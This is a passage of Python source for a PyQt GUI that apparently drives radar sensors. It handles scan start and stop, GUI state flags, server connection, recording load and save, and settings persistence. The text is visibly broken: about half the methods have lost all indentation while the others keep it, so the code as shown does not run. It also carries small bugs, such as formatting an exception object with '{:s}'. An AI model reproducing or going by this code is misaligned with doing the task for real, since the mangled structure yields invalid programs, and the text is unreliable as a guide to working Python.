message_box.setStandardButtons(QtWidgets.QMessageBox.Ok)
message_box.setWindowTitle("Alert")
message_box.setText(text.replace("\n", "<br>"))
if info_text:
message_box.setInformativeText(info_text.replace("\n", "<br>"))
if any(sys.exc_info()):
detailed_text = traceback.format_exc()
message_box.setDetailedText(detailed_text)
message_box.exec_()
def info_handle(self, info, detailed_info=None, blocking=True):
msg = QtWidgets.QMessageBox(self.main_widget)
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText(info)
if detailed_info:
msg.setDetailedText(detailed_info)
msg.setWindowTitle("Info")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
if blocking:
msg.exec_()
else:
msg.show()
return msg
def warning_message(self, warning, detailed_warning=None):
msg = QtWidgets.QMessageBox(self.main_widget)
msg.setIcon(QtWidgets.QMessageBox.Warning)
msg.setText(warning)
if detailed_warning:
msg.setDetailedText(detailed_warning)
msg.setWindowTitle("Warning")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
return retval == 1024
    def start_scan(self, from_file=False):
        """Validate the setup and launch a scan in a worker thread.

        With *from_file* set, the sensor config is restored from the loaded
        file and the data is replayed instead of streamed from a sensor.
        """
        if not self.get_sensors():
            self.error_message("Please select at least one sensor")
            return
        if self.current_module_info.module is None:
            self.error_message("Please select a service or detector")
            return
        try:
            sweep_buffer = int(self.textboxes["sweep_buffer"].text())
            assert sweep_buffer > 0
        except (ValueError, AssertionError):
            # Invalid entry: reset to the default and abort.
            self.textboxes["sweep_buffer"].setText(str("1000"))
            self.error_message("Sweep buffer needs to be a positive integer")
            return
        sensor_config = self.get_sensor_config()
        if from_file:
            sensor_config._loads(self.data.sensor_config_dump)
            self.set_gui_state("replaying_data", True)
        self.update_canvas(force_update=True)  # Get new processing config
        processing_config = self.update_service_params()
        sensor_config = self.save_gui_settings_to_sensor_config()
        params = {
            "sensor_config": sensor_config,
            "data_source": "file" if from_file else "stream",
            "module_info": self.current_module_info,
            "sweep_buffer": sweep_buffer,
            "service_params": processing_config,
            "ml_settings": None,
            "multi_sensor": self.current_module_info.multi_sensor,
            "rss_version": getattr(self, "rss_version", None),
        }
        # On an ML tab, the ML state must approve (and augment) the params.
        ml_tab = self.get_gui_state("ml_tab")
        if ml_tab != "main":
            if not (self.ml_state.get_ml_settings_for_scan(ml_tab, params)):
                return
        self.threaded_scan = Threaded_Scan(params, parent=self)
        self.threaded_scan.sig_scan.connect(self.thread_receive)
        self.sig_scan.connect(self.threaded_scan.receive)
        self.module_dd.setEnabled(False)
        # Reset per-scan statistics before starting the worker.
        self.num_recv_frames = 0
        self.num_missed_frames = 0
        self.measured_update_rate_fc.reset()
        self.reset_missed_frame_text_time = None
        self.threaded_scan.start()
        if isinstance(processing_config, configbase.Config):
            # configbase configs stay editable while live.
            self.basic_processing_config_section.body_widget.setEnabled(True)
            self.buttons["service_defaults"].setEnabled(False)
            self.buttons["advanced_defaults"].setEnabled(False)
            processing_config._state = configbase.Config.State.LIVE
        else:
            self.basic_processing_config_section.body_widget.setEnabled(False)
        self.buttons["connect"].setEnabled(False)
        self.enable_tabs(False)
        self.set_gui_state("scan_is_running", True)
    def set_gui_state(self, state, val):
        """Update one GUI state flag and refresh all dependent widgets.

        Parameters
        ----------
        state : str or None
            Key in self.gui_states. None skips the flag update but still
            refreshes the widgets; an unknown key aborts with a printout.
        val : object
            New value for the flag.

        NOTE(review): statement order matters below — later sections read
        flags that earlier calls (e.g. nested set_gui_state) may have set.
        """
        if state in self.gui_states:
            self.gui_states[state] = val
        elif state is None:
            pass
        else:
            print("{} is an unknown state!".format(state))
            return
        states = self.gui_states
        # Visible, enabled, text
        # Start button
        self.buttons["start"].setEnabled(
            all(
                [
                    self.in_supported_mode or states["load_state"] == LoadState.LOADED,
                    not states["scan_is_running"],
                    not states["has_config_error"],
                    states["server_connected"] or states["load_state"] == LoadState.LOADED,
                ]
            )
        )
        if states["load_state"] == LoadState.LOADED:
            self.buttons["start"].setText("New measurement")
        else:
            self.buttons["start"].setText("Start measurement")
        # Stop button
        self.buttons["stop"].setEnabled(states["scan_is_running"])
        # Save to file button
        self.buttons["save_scan"].setEnabled(
            all(
                [
                    states["load_state"] != LoadState.UNLOADED,
                    not states["scan_is_running"],
                ]
            )
        )
        # Load from file button
        self.buttons["load_scan"].setEnabled(not states["scan_is_running"])
        # Replay button
        self.buttons["replay_buffered"].setEnabled(
            all(
                [
                    states["load_state"] != LoadState.UNLOADED,
                    not states["scan_is_running"],
                ]
            )
        )
        # Data source
        self.labels["data_source"].setVisible(
            bool(states["load_state"] == LoadState.LOADED and self.data_source)
        )
        try:
            text = "Loaded " + os.path.basename(self.data_source)
        except Exception:
            # data_source may be None (buffered data) — show nothing.
            text = ""
        if len(text) > 50:
            # Truncate long filenames so the label fits the panel.
            text = text[:47] + "..."
        self.labels["data_source"].setText(text)
        # Sweep buffer
        self.labels["sweep_buffer"].setVisible(states["load_state"] != LoadState.LOADED)
        self.textboxes["sweep_buffer"].setVisible(states["load_state"] != LoadState.LOADED)
        self.textboxes["sweep_buffer"].setEnabled(not states["scan_is_running"])
        # Stored frames
        if states["load_state"] == LoadState.LOADED:
            text = "Number of frames"
        else:
            text = "Buffered frames"
        self.labels["stored_frames"].setText(text)
        try:
            num_stored = len(self.data.data)
        except Exception:
            num_stored = 0
        self.textboxes["stored_frames"].setText(str(num_stored))
        # RSS version
        lbl = self.labels["rssver"]
        try:
            strict_ver = states["connection_info"]["strict_version"]
        except Exception:
            strict_ver = None
        if strict_ver is not None:
            # Warn (in red) when server and tool SDK versions differ.
            if strict_ver < StrictVersion(SDK_VERSION):
                ver_mismatch = "RSS server"
            elif strict_ver > StrictVersion(SDK_VERSION):
                ver_mismatch = "Exploration Tool"
            else:
                ver_mismatch = None
            text = "RSS v" + str(strict_ver)
            if ver_mismatch:
                text += " ({} upgrade recommended)".format(ver_mismatch)
                lbl.setStyleSheet("QLabel {color: red}")
            else:
                lbl.setStyleSheet("")
            lbl.setText(text)
            lbl.show()
        else:
            lbl.hide()
        # Unsupported mode warning
        visible = self.in_supported_mode is not None and not self.in_supported_mode
        self.labels["unsupported_mode"].setVisible(visible)
        # Other
        sensor_config = self.get_sensor_config()
        if sensor_config:
            if states["load_state"] == LoadState.LOADED:
                sensor_config._state = configbase.Config.State.LOADED_READONLY
            elif not states["scan_is_running"]:
                sensor_config._state = configbase.Config.State.LOADED
            else:
                sensor_config._state = configbase.Config.State.LIVE
        for sensor_widget in self.sensor_widgets.values():
            sensor_widget.setEnabled(not states["scan_is_running"])
        self.set_multi_sensors()
        self.buttons["sensor_defaults"].setEnabled(not states["scan_is_running"])
        if state == "server_connected":
            connected = val
            if connected:
                self.buttons["connect"].setText("Disconnect")
                self.buttons["connect"].setStyleSheet("QPushButton {color: red}")
                self.buttons["advanced_port"].setEnabled(False)
                self.set_multi_sensors()
            else:
                self.buttons["connect"].setText("Connect")
                self.buttons["connect"].setStyleSheet("QPushButton {color: black}")
                self.buttons["advanced_port"].setEnabled(True)
                self.statusBar().showMessage("Not connected")
        if state == "ml_tab":
            # Hide everything, then re-show the sections the chosen tab uses.
            tab = val
            self.feature_sidepanel.select_mode(val)
            self.server_section.hide()
            self.basic_processing_config_section.hide()
            self.basic_sensor_config_section.hide()
            self.advanced_sensor_config_section.hide()
            self.session_info_section.hide()
            self.control_section.hide()
            self.feature_section.hide()
            self.textboxes["sweep_buffer_ml"].hide()
            self.textboxes["sweep_buffer"].hide()
            self.module_dd.show()
            if tab == "main":
                if states["server_connected"]:
                    self.basic_sensor_config_section.show()
                    self.advanced_sensor_config_section.show()
                self.server_section.show()
                self.control_section.show()
                self.textboxes["sweep_buffer"].show()
                self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
                self.session_info_section.show()
            elif tab == "feature_select":
                self.feature_section.button_event(override=False)
                if states["server_connected"]:
                    self.basic_sensor_config_section.show()
                    self.advanced_sensor_config_section.show()
                self.server_section.show()
                self.feature_section.show()
                self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
                self.set_sensors(self.get_sensors(widget_name="main"))
                self.feature_select.check_limits()
            elif tab == "feature_extract":
                self.server_section.show()
                self.control_section.show()
                self.feature_section.button_event(override=False)
                self.feature_section.show()
                self.module_dd.hide()
                self.buttons["start"].setText("Start extraction")
                self.textboxes["sweep_buffer_ml"].show()
                self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
                self.set_sensors(self.get_sensors(widget_name="main"))
                if self.ml_feature_plot_widget is None:
                    # Lazily create the feature plot the first time this tab opens.
                    self.feature_extract.init_graph()
                    self.ml_feature_plot_widget = self.feature_extract.plot_widget
            elif tab == "feature_inspect":
                self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
                self.feature_section.show()
                self.feature_inspect.update_frame("frames", 1, init=True)
                self.feature_inspect.update_sliders()
            elif tab == "model_select":
                self.panel_scroll_area_widget.setCurrentWidget(self.training_sidepanel)
            elif tab == "train":
                self.panel_scroll_area_widget.setCurrentWidget(self.training_sidepanel)
            elif tab == "eval":
                if states["server_connected"]:
                    self.basic_sensor_config_section.show()
                    self.advanced_sensor_config_section.show()
                self.server_section.show()
                self.control_section.show()
                self.feature_section.show()
                self.textboxes["sweep_buffer"].show()
                self.panel_scroll_area_widget.setCurrentWidget(self.main_sublayout_widget)
                if self.ml_eval_model_plot_widget is None:
                    # Lazily create the evaluation plot the first time this tab opens.
                    self.eval_model.init_graph()
                    self.ml_eval_model_plot_widget = self.eval_model.plot_widget
        if state == "ml_model_loaded":
            allow_edit = not val
            if self.ml_state.get_state("model_source") == "internal":
                allow_edit = True
            elif self.ml_state.get_state("model_source") is None:
                allow_edit = True
            self.set_gui_state("ml_sensor_settings_locked", val)
            self.gui_states["ml_overwrite_settings"] = False
            self.model_select.allow_layer_edit(allow_edit)
            self.feature_select.allow_feature_edit(not val)
            self.module_dd.setEnabled(not val)
        if state == "ml_overwrite_settings":
            if self.ml_state.get_state("settings_locked"):
                warning = "Do you really want to unlock model settings?"
                warning += "\nThis will use GUI values when saving or evaluationg the model!"
                detailed = "The model might stop working, if you change sensor/feature settings!"
                detailed += "\n When saving, GUI settings will be used to overwrite the settings!"
                if self.warning_message(warning, detailed_warning=detailed):
                    self.feature_select.allow_feature_edit(True)
                    self.set_gui_state("ml_sensor_settings_locked", False)
        if state == "ml_sensor_settings_locked":
            self.basic_sensor_config_section.body_widget.setEnabled(not val)
            self.advanced_sensor_config_section.body_widget.setEnabled(not val)
            self.ml_state.set_state("settings_locked", val)
        if states["ml_mode"] and hasattr(self, "feature_select"):
            config_is_valid = self.feature_select.is_config_valid()
            self.feature_select.buttons["start"].setEnabled(
                all(
                    [
                        states["server_connected"] or states["load_state"] == LoadState.LOADED,
                        not states["scan_is_running"],
                        not states["has_config_error"],
                        config_is_valid,
                    ]
                )
            )
            self.feature_select.buttons["stop"].setEnabled(states["scan_is_running"])
            self.feature_select.buttons["replay_buffered"].setEnabled(
                all(
                    [
                        states["load_state"] != LoadState.UNLOADED,
                        not states["scan_is_running"],
                        config_is_valid,
                    ]
                )
            )
            self.feature_select.check_limits()
        # Disable service help button if current_module_info does not have a docs_link.
        self.buttons["service_help"].setEnabled(self.current_module_info.docs_url is not None)
        if self.current_module_info.module is None:
            tooltip_text = f"Get help with services on ReadTheDocs"
        elif self.current_module_info.docs_url is not None:
            tooltip_text = f'Get help with "{self.current_module_info.label}" on ReadTheDocs'
        else:
            tooltip_text = None
        self.buttons["service_help"].setToolTip(tooltip_text)
def get_gui_state(self, state):
if state in self.gui_states:
return self.gui_states[state]
else:
print("{} is an unknown state!".format(state))
return
    def stop_scan(self):
        """Stop an ongoing scan and restore the GUI to its idle state."""
        # Tell the scan thread to stop; it aborts processing and exits.
        self.sig_scan.emit("stop", "", None)
        if not self.get_gui_state("ml_sensor_settings_locked"):
            self.module_dd.setEnabled(True)
        self.buttons["connect"].setEnabled(True)
        self.basic_processing_config_section.body_widget.setEnabled(True)
        processing_config = self.get_processing_config()
        if isinstance(processing_config, configbase.Config):
            # configbase-based configs become editable again after the scan.
            self.buttons["service_defaults"].setEnabled(True)
            self.buttons["advanced_defaults"].setEnabled(True)
            processing_config._state = configbase.Config.State.LOADED
        self.set_gui_state("replaying_data", False)
        self.enable_tabs(True)
        self.set_gui_state("scan_is_running", False)
def set_log_level(self):
log_level = logging.INFO
if self.checkboxes["verbose"].isChecked():
log_level = logging.DEBUG
utils.set_loglevel(log_level)
    def connect_to_server(self):
        """Toggle the server connection.

        When currently disconnected: create a client for the selected
        interface (socket/SPI/simulated/UART), connect, probe which sensors
        respond, and update GUI state. When currently connected: stop any
        session and disconnect.
        """
        if not self.get_gui_state("server_connected"):
            # Build the client matching the selected interface.
            if self.interface_dd.currentText().lower() == "socket":
                host = self.textboxes["host"].text()
                self.client = clients.SocketClient(host)
                statusbar_connection_info = "socket ({})".format(host)
            elif self.interface_dd.currentText().lower() == "spi":
                self.client = clients.SPIClient()
                statusbar_connection_info = "SPI"
            elif self.interface_dd.currentText().lower() == "simulated":
                self.client = clients.MockClient()
                statusbar_connection_info = "simulated interface"
            else:
                port = self.ports_dd.currentText()
                if not port:
                    self.error_message("Please select port first!")
                    return
                # Drop any description text after the port name.
                port, *_ = port.split(" ")
                if self.override_baudrate:
                    print("Warning: Overriding baudrate ({})!".format(self.override_baudrate))
                self.client = clients.UARTClient(port, override_baudrate=self.override_baudrate)
                statusbar_connection_info = "UART ({})".format(port)
            self.client.squeeze = False
            try:
                info = self.client.connect()
            except Exception:
                text = "Could not connect to server"
                info_text = None
                if isinstance(self.client, clients.UARTClient):
                    info_text = (
                        "Did you select the right COM port?"
                        " Try unplugging and plugging back in the module!"
                    )
                self.error_message(text, info_text=info_text)
                return
            self.rss_version = info.get("version_str", None)
            connected_sensors = [1]  # for the initial set
            self.sensors_available = [1]  # for the sensor widget(s)
            if isinstance(self.client, clients.SocketClient):
                sensor_count = min(info.get("board_sensor_count", 4), 4)
                self.sensors_available = list(range(1, sensor_count + 1))
                if sensor_count > 1:
                    # Probe each sensor by starting/stopping a short session;
                    # a SessionSetupError means that slot has no sensor.
                    config = configs.SparseServiceConfig()
                    connected_sensors = []
                    for i in range(sensor_count):
                        sensor = i + 1
                        config.sensor = sensor
                        try:
                            self.client.start_session(config)
                            self.client.stop_session()
                        except clients.base.SessionSetupError:
                            pass
                        except Exception:
                            self.error_message("Could not connect to server")
                            return
                        else:
                            connected_sensors.append(sensor)
            elif isinstance(self.client, clients.MockClient):
                self.sensors_available = list(range(1, 5))
            if not connected_sensors:
                self.error_message("No sensors connected, check connections")
                try:
                    self.client.disconnect()
                except Exception:
                    pass
                return
            if not self.get_gui_state("ml_sensor_settings_locked"):
                self.set_sensors(connected_sensors)
            self.set_gui_state("server_connected", True)
            self.set_gui_state("load_state", LoadState.UNLOADED)
            self.set_gui_state("connection_info", info)
            self.statusBar().showMessage("Connected via {}".format(statusbar_connection_info))
            if self.current_module_info.module is None:
                # Auto-select the first real service after connecting.
                self.module_dd.setCurrentIndex(1)
        else:
            # Currently connected: tear down session and disconnect.
            self.sensors_available = None
            self.set_gui_state("server_connected", False)
            self.set_gui_state("connection_info", None)
            self.sig_scan.emit("stop", "", None)
            try:
                self.client.stop_session()
            except Exception:
                pass
            try:
                self.client.disconnect()
            except Exception:
                pass
def load_gui_settings_from_sensor_config(self, config=None): # TODO
return
def save_gui_settings_to_sensor_config(self): # TODO
return self.get_sensor_config()
    def update_service_params(self):
        """Collect and validate service parameters from the GUI.

        configbase-based modules return their processing config object
        directly. Legacy (dict-based) modules have each textbox/checkbox
        read, range-checked (invalid values are reset to their default),
        and written into self.service_params. All validation errors are
        shown in a single message box.

        Returns
        -------
        configbase.Config, dict, or None
            None when the current module has no legacy labels registered.
        """
        if isinstance(self.get_processing_config(), configbase.Config):
            return self.get_processing_config()
        errors = []
        mode = self.current_module_label
        if mode not in self.service_labels:
            return None
        for key in self.service_labels[mode]:
            entry = self.service_labels[mode][key]
            if "box" in entry:
                er = False
                # is_positive=False: legacy params may legitimately be <= 0.
                val = self.is_float(entry["box"].text(), is_positive=False)
                limits = entry["limits"]
                default = entry["default"]
                if val is not False:
                    val, er = self.check_limit(
                        val, entry["box"], limits[0], limits[1], set_to=default
                    )
                else:
                    # Unparsable input: reset the textbox to the default.
                    er = True
                    val = default
                    entry["box"].setText(str(default))
                if er:
                    errors.append(
                        "{:s} must be between {:s} and {:s}!\n".format(
                            key, str(limits[0]), str(limits[1])
                        )
                    )
                self.service_params[key]["value"] = self.service_params[key]["type"](val)
            elif "checkbox" in entry:
                self.service_params[key]["value"] = entry["checkbox"].isChecked()
            if "send_process_data" in key:
                # Attach previously loaded auxiliary process data, if enabled.
                if self.advanced_process_data["use_data"]:
                    if self.advanced_process_data["process_data"] is not None:
                        data = self.advanced_process_data["process_data"]
                        self.service_params["send_process_data"]["value"] = data
                    else:
                        data = self.service_params["send_process_data"]["text"]
                        print(data + " data not available")
                else:
                    self.service_params["send_process_data"]["value"] = None
        if len(errors):
            self.error_message("".join(errors))
        return self.service_params
def is_float(self, val, is_positive=True):
try:
f = float(val)
if is_positive and f <= 0:
raise ValueError("Not positive")
return f
except Exception:
return False
def check_limit(self, val, field, start, end, set_to=None):
out_of_range = False
try:
float(val)
except (ValueError, TypeError):
val = start
out_of_range = True
if val < start:
val = start
out_of_range = True
if val > end:
val = end
out_of_range = True
if out_of_range:
if set_to is not None:
val = set_to
field.setText(str(val))
return val, out_of_range
    def load_scan(self, restart=False):
        """Load a saved scan from file and replay it.

        Parameters
        ----------
        restart : bool
            When True, skip the file dialog and replay the already loaded
            data.
        """
        if restart:
            self.set_gui_state("load_state", LoadState.LOADED)
            self.start_scan(from_file=True)
            return
        options = QtWidgets.QFileDialog.Options()
        options |= QtWidgets.QFileDialog.DontUseNativeDialog
        filename, _ = QtWidgets.QFileDialog.getOpenFileName(
            self,
            "Load scan",
            "",
            "HDF5 data files (*.h5);; NumPy data files (*.npz)",
            options=options,
        )
        if not filename:
            return
        try:
            record = recording.load(filename)
        except Exception:
            traceback.print_exc()
            self.error_message(
                (
                    "Failed to load file"
                    "\n\n"
                    "Note: loading data fetched with RSS v1 is not supported."
                    "To load old data, please use an older version of the Exploration Tool."
                )
            )
            return
        # Resolve the module that produced the record, falling back to a
        # service-only module keyed on the sensor mode.
        try:
            if record.module_key is None:
                raise Exception
            module_info = MODULE_KEY_TO_MODULE_INFO_MAP[record.module_key]
            index = self.module_dd.findText(module_info.label, QtCore.Qt.MatchFixedString)
        except Exception:
            has_loaded_module = False
            print("Can't find the module for the loaded data")
        else:
            has_loaded_module = index != -1
        if not has_loaded_module:  # Just try loading the data in the service-only module
            try:
                module_info = MODULE_KEY_TO_MODULE_INFO_MAP[record.mode.name.lower()]
                index = self.module_dd.findText(module_info.label, QtCore.Qt.MatchFixedString)
            except Exception:
                self.error_message("Unknown mode in loaded file")
                return
        self.module_dd.setCurrentIndex(index)
        self.update_canvas()
        self.data = record
        sensor_config = self.get_sensor_config()
        sensor_config._loads(record.sensor_config_dump)
        # Order is important for the following 3 calls
        self.set_multi_sensors()
        self.set_sensors(sensor_config.sensor)
        self.set_gui_state("load_state", LoadState.LOADED)
        if has_loaded_module:
            processing_config = self.get_processing_config()
            if isinstance(processing_config, configbase.ProcessingConfig):
                if record.processing_config_dump is not None:
                    try:
                        processing_config._loads(record.processing_config_dump)
                    except Exception:
                        traceback.print_exc()
            else:
                try:
                    self.load_legacy_processing_config_dump(record)
                except Exception:
                    traceback.print_exc()
        self.data_source = filename
        self.start_scan(from_file=True)
def save_scan(self, record):
if len(record.data) == 0:
self.error_message("No data to save")
return
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
title = "Save scan"
file_types = "HDF5 data files (*.h5);; NumPy data files (*.npz)"
filename, info = QtWidgets.QFileDialog.getSaveFileName(
self, title, "", file_types, options=options
)
if not filename:
return
record.mode = self.get_sensor_config().mode
record.module_key = self.current_module_info.key
record.processing_config_dump = None
record.legacy_processing_config_dump = None
processing_config = self.get_processing_config()
if isinstance(processing_config, configbase.Config):
record.processing_config_dump = processing_config._dumps()
else:
try:
self.save_legacy_processing_config_dump_to_record(record)
except Exception:
traceback.print_exc()
try:
if "h5" in info:
recording.save_h5(filename, record)
else:
recording.save_npz(filename, record)
except Exception as e:
traceback.print_exc()
self.error_message("Failed to save file:\n {:s}".format(e))
    def load_legacy_processing_config_dump(self, record):
        """Restore legacy (dict-based) processing parameters from a record.

        Updates both self.service_params and the corresponding GUI
        textboxes. Does nothing when the record has no (valid) legacy dump.
        """
        try:
            d = json.loads(record.legacy_processing_config_dump)
        except Exception:
            # Missing or malformed dump — nothing to restore.
            return
        assert isinstance(self.get_processing_config(), dict)
        for k, v in d.items():
            try:
                param = self.service_params[k]
                objtype = param.get("type", None)
                if objtype is None:
                    continue
                # Coerce the JSON value back to the parameter's declared type.
                v = objtype(v)
                self.service_params[k]["value"] = v
                box = self.service_labels[self.current_module_info.label][k]["box"]
                box.setText(str(v))
            except Exception:
                traceback.print_exc()
def save_legacy_processing_config_dump_to_record(self, record):
if not (self.service_params and isinstance(self.service_params, dict)):
return
d = {}
for key in self.service_params:
if key == "processing_handle":
continue
try:
val = self.service_params[key]["value"]
json.dumps(val) # Make sure it's serializable
d[key] = val
except Exception:
traceback.print_exc()
if d:
record.legacy_processing_config_dump = json.dumps(d)
def handle_advanced_process_data(self, action=None):
load_text = self.buttons["load_process_data"].text()
try:
data_text = self.service_params["send_process_data"]["text"]
except Exception as e:
print("Function not available! \n{}".format(e))
return
if action == "save":
if self.advanced_process_data["process_data"] is not None:
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
title = "Save " + load_text
file_types = "NumPy data files (*.npy)"
fname, info = QtWidgets.QFileDialog.getSaveFileName(
self, title, "", file_types, options=options
)
if fname:
try:
np.save(fname, self.advanced_process_data["process_data"])
except Exception as e:
self.error_message("Failed to save " + load_text + "{}".format(e))
return
self.advanced_process_data["use_data"] = True
self.buttons["load_process_data"].setText(load_text.replace("Load", "Unload"))
self.buttons["load_process_data"].setStyleSheet("QPushButton {color: red}")
else:
self.error_message(data_text + " data not availble!".format())
elif action == "load":
loaded = False
if "Unload" not in load_text:
mode = self.current_module_label
dialog = HandleAdvancedProcessData(mode, data_text, self)
dialog.exec_()
data = dialog.get_data()
if data is not None:
loaded = True
dialog.deleteLater()
if loaded:
self.advanced_process_data["use_data"] = True
self.advanced_process_data["process_data"] = data
self.buttons["load_process_data"].setText(load_text.replace("Load", "Unload"))
self.buttons["load_process_data"].setStyleSheet("QPushButton {color: red}")
else:
self.buttons["load_process_data"].setText(load_text.replace("Unload", "Load"))
self.buttons["load_process_data"].setStyleSheet("QPushButton {color: black}")
self.advanced_process_data["use_data"] = False
self.advanced_process_data["process_data"] = None
else:
print("Process data action not implemented")
def thread_receive(self, message_type, message, data=None):
if "error" in message_type:
if message_type == "session_setup_error":
error = "Failed to setup session (bad config)!\n"
if "socket" in self.interface_dd.currentText().lower():
error += "Check that selected sensors are connected and working!\n"
error += "Check Streaming server log for erros!"
self.error_message(error)
elif "client" in message_type:
self.stop_scan()
if self.get_gui_state("server_connected"):
self.connect_to_server()
elif "proccessing" in message_type:
self.stop_scan()
self.error_message("{}".format(message))
elif message_type == "scan_data":
if self.get_gui_state("load_state") != LoadState.LOADED:
self.data = data
self.data_source = None
self.set_gui_state("load_state", LoadState.BUFFERED)
elif message_type == "scan_done":
self.stop_scan()
elif "update_external_plots" in message_type:
if data is not None:
self.update_external_plots(data)
elif "sweep_info" in message_type:
self.update_sweep_info(data)
elif "session_info" in message_type:
self.session_info = data
self.reload_pg_updater(session_info=data)
self.session_info_view.update(self.session_info)
elif "process_data" in message_type:
self.advanced_process_data["process_data"] = data
elif "set_sensors" in message_type:
self.set_sensors(data)
else:
print("Thread data not implemented!")
print(message_type, message, data)
def update_external_plots(self, data):
if isinstance(data, dict) and data.get("ml_plotting") is True:
if self.get_gui_state("ml_tab") == "feature_extract":
self.ml_feature_plot_widget.update(data)
elif self.get_gui_state("ml_tab") == "feature_select":
self.feature_select.plot_feature(data)
elif self.get_gui_state("ml_tab") == "eval":
self.ml_eval_model_plot_widget.update(data)
self.ml_data = data
else:
self.plot_queue.append(data)
def plot_timer_fun(self):
if not self.plot_queue:
return
data, *self.plot_queue = self.plot_queue[-2:]
self.service_widget.update(data)
    def update_sweep_info(self, infos):
        """Update frame counters, measured update rate, and data-quality
        warnings from per-sweep metadata dicts."""
        if not isinstance(infos, list):  # If squeezed
            infos = [infos]
        missed = any([e.get("missed_data", False) for e in infos])
        saturated = any([e.get("data_saturated", False) for e in infos])
        data_quality_warning = any([e.get("data_quality_warning", False) for e in infos])
        if missed:
            self.num_missed_frames += 1
        self.num_recv_frames += 1
        # Cap the displayed counts; prefix ">" once the cap is reached.
        show_lim = int(1e6)
        num_missed_show = min(self.num_missed_frames, show_lim)
        missed_sym = ">" if num_missed_show >= show_lim else ""
        num_recv_show = min(self.num_recv_frames, show_lim)
        recv_sym = ">" if num_recv_show >= show_lim else ""
        text = "Frames: {:s}{:d} (missed {:s}{:d})".format(
            recv_sym,
            num_recv_show,
            missed_sym,
            num_missed_show,
        )
        self.labels["sweep_info"].setText(text)
        tick_info = self.measured_update_rate_fc.tick_values()
        if tick_info is not None:
            _, f, _ = tick_info
            self.labels["measured_update_rate"].setText(f"{f:>10.1f} Hz")
        # Color the counter red for a short while after a missed frame.
        RED_TEXT_TIMEOUT = 2
        now = time.time()
        if missed:
            self.labels["sweep_info"].setStyleSheet("QLabel {color: red}")
            self.reset_missed_frame_text_time = now + RED_TEXT_TIMEOUT
        if self.reset_missed_frame_text_time is None or self.reset_missed_frame_text_time < now:
            self.labels["sweep_info"].setStyleSheet("")
        if data_quality_warning:
            self.labels["data_warnings"].setText("Warning: Bad data quality, restart service!")
        elif saturated:
            self.labels["data_warnings"].setText("Warning: Data saturated, reduce gain!")
        self.labels["data_warnings"].setVisible(saturated or data_quality_warning)
        if self.get_gui_state("load_state") != LoadState.LOADED:
            # Show how many frames fit in the sweep buffer so far.
            try:
                text = str(min(self.num_recv_frames, int(self.textboxes["sweep_buffer"].text())))
            except Exception:
                text = ""
            self.textboxes["stored_frames"].setText(text)
    def start_up(self):
        """Restore GUI (and ML) settings persisted by the previous session.

        Both restores are best-effort: any failure is printed and ignored.
        """
        if not self.under_test:
            if os.path.isfile(self.LAST_CONF_FILENAME):
                try:
                    last = np.load(self.LAST_CONF_FILENAME, allow_pickle=True)
                    self.load_last_config(last.item())
                except Exception as e:
                    print("Could not load settings from last session\n{}".format(e))
            if os.path.isfile(self.LAST_ML_CONF_FILENAME) and self.get_gui_state("ml_mode"):
                try:
                    last = np.load(self.LAST_ML_CONF_FILENAME, allow_pickle=True)
                    self.feature_select.update_feature_list(last.item()["feature_list"])
                    self.feature_sidepanel.set_frame_settings(last.item()["frame_settings"])
                    self.model_select.update_layer_list(last.item()["model_layers"])
                    self.feature_sidepanel.last_folder = last.item().get("last_folder", None)
                except Exception as e:
                    print("Could not load ml settings from last session\n{}".format(e))
    def load_last_config(self, last_config):
        """Apply a settings dict previously saved by closeEvent."""
        # Restore sensor configs (configbase)
        dumps = last_config.get("sensor_config_dumps", {})
        for key, conf in self.module_label_to_sensor_config_map.items():
            if key in dumps:
                dump = last_config["sensor_config_dumps"][key]
                try:
                    conf._loads(dump)
                except Exception:
                    print("Could not load sensor config for '{}'".format(key))
                    conf._reset()  # TODO: load module defaults
        # Restore processing configs (configbase)
        dumps = last_config.get("processing_config_dumps", {})
        for key, conf in self.module_label_to_processing_config_map.items():
            if key in dumps:
                dump = last_config["processing_config_dumps"][key]
                try:
                    conf._loads(dump)
                except Exception:
                    print("Could not load processing config for '{}'".format(key))
                    conf._reset()
        # Restore misc. settings
        self.textboxes["sweep_buffer"].setText(last_config["sweep_buffer"])
        self.interface_dd.setCurrentIndex(last_config["interface"])
        self.ports_dd.setCurrentIndex(last_config["port"])
        self.textboxes["host"].setText(last_config["host"])
        if last_config.get("override_baudrate"):
            self.override_baudrate = last_config["override_baudrate"]
        # Restore processing configs (legacy)
        if last_config["service_settings"]:
            for module_label in last_config["service_settings"]:
                processing_config = self.get_default_processing_config(module_label)
                if not processing_config:
                    continue
                if isinstance(processing_config, configbase.Config):
                    # configbase configs were restored from dumps above.
                    continue
                self.add_params(processing_config, start_up_mode=module_label)
                labels = last_config["service_settings"][module_label]
                for key in labels:
                    if "checkbox" in labels[key]:
                        checked = labels[key]["checkbox"]
                        self.service_labels[module_label][key]["checkbox"].setChecked(checked)
                    elif "box" in labels[key]:
                        text = str(labels[key]["box"])
                        self.service_labels[module_label][key]["box"].setText(text)
    def closeEvent(self, event=None):
        """Persist GUI (and ML) settings to disk and shut down cleanly."""
        # Legacy processing params
        service_params = {}
        for mode in self.service_labels:
            if service_params.get(mode) is None:
                service_params[mode] = {}
            for key in self.service_labels[mode]:
                if service_params[mode].get(key) is None:
                    service_params[mode][key] = {}
                if "checkbox" in self.service_labels[mode][key]:
                    checked = self.service_labels[mode][key]["checkbox"].isChecked()
                    service_params[mode][key]["checkbox"] = checked
                elif "box" in self.service_labels[mode][key]:
                    val = self.service_labels[mode][key]["box"].text()
                    service_params[mode][key]["box"] = val
        # Serialize configbase sensor/processing configs per module.
        sensor_config_dumps = {}
        for module_label, config in self.module_label_to_sensor_config_map.items():
            try:
                sensor_config_dumps[module_label] = config._dumps()
            except AttributeError:
                pass
        processing_config_dumps = {}
        for module_label, config in self.module_label_to_processing_config_map.items():
            try:
                processing_config_dumps[module_label] = config._dumps()
